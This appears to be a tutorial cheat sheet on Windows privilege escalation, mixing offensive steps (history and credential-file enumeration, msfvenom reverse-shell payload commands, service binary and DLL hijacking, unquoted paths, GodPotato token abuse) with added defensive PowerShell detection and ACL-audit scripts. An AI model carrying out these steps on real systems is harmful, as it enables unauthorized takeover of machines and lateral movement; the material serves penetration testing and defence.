Introduction
What is Privilege Escalation?
Privilege escalation is an attack that gains unauthorized privileged access to a system. It not only gives us access to every resource on that system, but it is also closely tied to lateral movement: we can dump other users' credentials that are saved on the system and then use them to try to access other devices on the same intranet. Here I will show you some common methods of privilege escalation on the Windows operating system.
Manual Enumeration (Information Gathering)
- type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
  : check the user's command history
- whoami /priv
  : check your privileges
- Get-ChildItem -Path C:\ -Include *.kdbx,*.zip,*backup* -File -Recurse -ErrorAction SilentlyContinue
  : search for key files
- type C:\Users\Public\Transcripts\transcript01.txt
  : read saved PowerShell transcripts
- Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
  : list all installed applications
- Event Viewer: check Script Block Logging
- whoami /groups
  : check my group memberships
- Get-Process
  : list all running processes
- systeminfo
  : check the system version and try to find a kernel vulnerability
- netstat -ano
  : list all active connections
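The Script Block Logging check in the list above can be turned into a detection. The following is an added example and not part of the original article: it reads PowerShell script block events (event ID 4104 in Microsoft-Windows-PowerShell/Operational) and matches them against the enumeration commands listed above. The function names are my own, and the sample events at the bottom are constructed so the script can be tried without a live log.

```powershell
# Added example (not from the original article): scan PowerShell Script Block
# Logging (event ID 4104) for the enumeration commands in the cheat sheet.
# Assumes Script Block Logging is enabled on the host.

# Patterns derived from the enumeration commands above.
$EnumerationSignatures = @(
    @{ Name = 'PSReadLine history read'; Pattern = 'ConsoleHost_history\.txt' },
    @{ Name = 'Privilege check';         Pattern = 'whoami(\.exe)?\s+/priv' },
    @{ Name = 'Group check';             Pattern = 'whoami(\.exe)?\s+/groups' },
    @{ Name = 'Sensitive file hunt';     Pattern = 'Get-ChildItem.*-Recurse.*(\*\.kdbx|backup)' },
    @{ Name = 'Installed software list'; Pattern = 'CurrentVersion\\Uninstall' },
    @{ Name = 'Service enumeration';     Pattern = 'win32_service|wmic\s+service' },
    @{ Name = 'Scheduled task listing';  Pattern = 'schtasks(\.exe)?\s+/query' },
    @{ Name = 'Network connection list'; Pattern = 'netstat(\.exe)?\s+-ano' }
)

function Read-ScriptBlockEvents {
    # Pulls 4104 events from the live log (needs rights to read the Operational log).
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
    } -MaxEvents $MaxEvents -ErrorAction Stop | ForEach-Object {
        [pscustomobject]@{
            TimeCreated     = $_.TimeCreated
            UserId          = $_.UserId
            # Property index 2 of a 4104 event holds the script block text.
            ScriptBlockText = $_.Properties[2].Value
        }
    }
}

function Find-EnumerationActivity {
    # Takes objects with TimeCreated, UserId and ScriptBlockText and returns
    # one record per matched signature.
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($evt in $Events) {
        $text = ([string]$evt.ScriptBlockText -replace '\s+', ' ').Trim()
        foreach ($sig in $EnumerationSignatures) {
            if ($text -match $sig.Pattern) {
                [pscustomobject]@{
                    Time      = $evt.TimeCreated
                    User      = $evt.UserId
                    Signature = $sig.Name
                    Snippet   = $text.Substring(0, [Math]::Min(80, $text.Length))
                }
            }
        }
    }
}

# Constructed sample records (not real telemetry) so the matcher can be run offline.
$SampleEvents = @(
    [pscustomobject]@{ TimeCreated = '2024-01-01 10:00:00'; UserId = 'S-1-5-21-0-0-0-1001'; ScriptBlockText = 'whoami /priv' },
    [pscustomobject]@{ TimeCreated = '2024-01-01 10:00:05'; UserId = 'S-1-5-21-0-0-0-1001'; ScriptBlockText = 'type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' },
    [pscustomobject]@{ TimeCreated = '2024-01-01 10:00:09'; UserId = 'S-1-5-21-0-0-0-1001'; ScriptBlockText = 'Get-CimInstance -ClassName win32_service | Select Name,State,PathName' },
    [pscustomobject]@{ TimeCreated = '2024-01-01 10:01:00'; UserId = 'S-1-5-21-0-0-0-1002'; ScriptBlockText = 'Get-Date' }
)
Find-EnumerationActivity -Events $SampleEvents | Format-Table -AutoSize
```

Against a live host, run `Find-EnumerationActivity -Events (Read-ScriptBlockEvents)`. A single hit is usually an administrator doing their job; a burst of several different signatures from the same user within a few minutes is the pattern worth alerting on.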
Automated Enumeration (Information Gathering)
- winPEASx64.exe
- Seatbelt:
Seatbelt.exe -group=all
Service Binary Hijacking
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Find a service that is executed by an administrator account.
We can use icacls to check whether we have enough permission to overwrite the target executable file. Usage:
icacls "C:\path\to\program\program.exe"
Generate your Trojan executable file (reverse shell):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[local host] LPORT=[local port] -f exe -o reverse.exe
Replace the target executable file with our Trojan file
Restart-Service [service]
Service DLL Hijacking
Generate your payload dll (reverse shell)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[local host] LPORT=[local port] -f dll -o payload.dll
Start Procmon64.exe (an RDP connection is needed) and find a service that is executed by an administrator account
Use Procmon64.exe to find all DLLs that the target service loads
Replace the corresponding DLL with our Trojan DLL
Restart-Service [service which include this dll]
Unquoted Service Paths
- Find a service whose executable path contains spaces but is not quoted:
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
(execute in cmd terminal)
- Inject our Trojan file (generated by msfvenom), then start the service (PowerShell):
  Start-Service -Name "ServiceName"
Scheduled Tasks
- List the scheduled tasks and the executable each one runs:
schtasks /query /fo LIST /v | Select-String '(?i)TaskName|Next Run Time|Author|Run As User|Task To Run|^\s*$'
- Check Permission:
icacls C:\Path\to\target\<target>.exe
- Replace it with your Trojan file (you can generate it with msfvenom)
- Wait for it to execute
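The three checks above (writable service binaries, unquoted service paths, and writable scheduled-task executables) all come down to the same question: does a low-privileged principal hold write rights on a file or directory that a privileged process will later execute? The script below is an added example, not code from the original article; it is a read-only audit meant to be run by a defender in an elevated PowerShell on the host being reviewed. The function names and the list of low-privileged principals are my own choices.

```powershell
# Added example (not from the original article): read-only audit for writable
# service binaries, unquoted service paths and writable scheduled-task actions.

# Principals whose write access to a privileged binary or its directory is a finding.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Any of these bits lets the holder replace or alter the file (FullControl/Modify include them).
$WriteMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

function Get-LowPrivWriteAccess {
    # Returns the low-privileged principals that hold write-class rights on $Path.
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $LowPrivPrincipals -contains $_.IdentityReference.Value -and
        ([int]$_.FileSystemRights -band [int]$WriteMask) -ne 0
    } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique)
}

function Get-ServiceImagePath {
    # Extracts the executable from a PathName such as
    #   "C:\Program Files\Vendor\svc.exe" -arg   or   C:\Program Files\Vendor\svc.exe -arg
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Get-WritableServiceBinary {
    # Services whose image file a low-privileged user could overwrite.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $image = Get-ServiceImagePath $_.PathName
        $who = Get-LowPrivWriteAccess -Path $image
        if ($who.Count) {
            [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; Image = $image; WritableBy = $who -join ', ' }
        }
    }
}

function Get-UnquotedServicePath {
    # Unquoted image paths containing spaces, plus the directories in which a
    # spoofed intermediate executable (e.g. C:\Program.exe) would have to be created.
    Get-CimInstance -ClassName Win32_Service | Where-Object {
        $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -notlike 'C:\Windows\*'
    } | ForEach-Object {
        $image = Get-ServiceImagePath $_.PathName
        if ($image -notmatch ' ') { return }
        $parts = $image -split ' '
        $writableDirs = for ($i = 1; $i -lt $parts.Count; $i++) {
            $dir = Split-Path -Path ($parts[0..($i - 1)] -join ' ') -Parent
            if ($dir -and (Get-LowPrivWriteAccess -Path $dir).Count) { $dir }
        }
        [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; PathName = $_.PathName; WritableDirs = @($writableDirs) -join '; ' }
    }
}

function Get-WritableTaskAction {
    # Enabled scheduled tasks whose action executable a low-privileged user could replace.
    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        foreach ($action in @($task.Actions)) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            $who = Get-LowPrivWriteAccess -Path $exe
            if ($who.Count) {
                [pscustomobject]@{ Task = $task.TaskName; RunsAs = $task.Principal.UserId; Executable = $exe; WritableBy = $who -join ', ' }
            }
        }
    }
}

# Run all three checks and show the findings.
Get-WritableServiceBinary | Format-Table -AutoSize
Get-UnquotedServicePath  | Format-Table -AutoSize
Get-WritableTaskAction   | Format-Table -AutoSize
```

An empty table for all three is the expected result on a well-configured host. Findings where RunsAs is LocalSystem or an administrator account are the ones to fix first, either by quoting the path in the service's ImagePath or by removing the write ACE for the low-privileged principal.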
Using Exploits
Check permission:
whoami /priv
Look for SeImpersonatePrivilege in the output
Use PrintSpoofer / GodPotato
Check .NET version:
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name Version -ErrorAction SilentlyContinue | Where-Object { $_.Version -match '^\d+\.\d+' } | Select-Object PSChildName, Version
GodPotato usage:
.\GodPotato-NET4.exe -cmd "cmd /c whoami"
Other privileges that can be abused: SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, and SeDebug
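To turn the privilege check above into a repeatable audit, the following added example (not part of the original article) parses "whoami /priv" output, either from the current token or from a captured text file, and flags the privileges the article names as abusable. Function names and the short exposure descriptions are my own; the sample output at the end is constructed.

```powershell
# Added example (not from the original article): parse "whoami /priv" output
# and report the token privileges the article lists as abusable.

$AbusablePrivileges = @{
    'SeImpersonatePrivilege'        = 'token impersonation (PrintSpoofer / GodPotato class)'
    'SeAssignPrimaryTokenPrivilege' = 'assign a primary token to a new process'
    'SeBackupPrivilege'             = 'read files regardless of their ACL'
    'SeLoadDriverPrivilege'         = 'load kernel drivers'
    'SeDebugPrivilege'              = 'open and debug any process'
}

function ConvertFrom-WhoamiPriv {
    # Parses the privilege table (Privilege Name / Description / State columns).
    param([Parameter(Mandatory)][string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -match '^(?<Name>Se\w+Privilege)\s+(?<Desc>.+?)\s+(?<State>Enabled|Disabled)\s*$') {
            [pscustomobject]@{ Name = $Matches.Name; Description = $Matches.Desc.Trim(); State = $Matches.State }
        }
    }
}

function Get-AbusablePrivilege {
    # Defaults to the current token; pass -Lines to audit captured output instead.
    # A Disabled privilege is still reported, because the token holder can re-enable it.
    param([string[]]$Lines = (whoami /priv))
    ConvertFrom-WhoamiPriv -Lines $Lines |
        Where-Object { $AbusablePrivileges.ContainsKey($_.Name) } |
        ForEach-Object {
            [pscustomobject]@{ Privilege = $_.Name; State = $_.State; Exposure = $AbusablePrivileges[$_.Name] }
        }
}

# Constructed sample in the shape of "whoami /priv" output for a service account.
$Sample = @(
    'PRIVILEGES INFORMATION',
    '----------------------',
    '',
    'Privilege Name                Description                               State',
    '============================= ========================================= ========',
    'SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled',
    'SeImpersonatePrivilege        Impersonate a client after authentication Enabled',
    'SeCreateGlobalPrivilege       Create global objects                     Enabled',
    'SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled'
)
Get-AbusablePrivilege -Lines $Sample | Format-Table -AutoSize
```

Running it without -Lines audits the token of the current shell, which is the quickest way to confirm whether a service or application account has been granted more than it needs.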
By the way
Privilege escalation is very flexible, and the methods introduced here are only the most common ones. In a real engagement you need to gather information carefully and try to exploit human behaviour, design flaws, or oversights in operating systems or web applications. I recommend carefully reviewing the output of winPEAS, which often points out weaknesses that you can use to escalate privileges.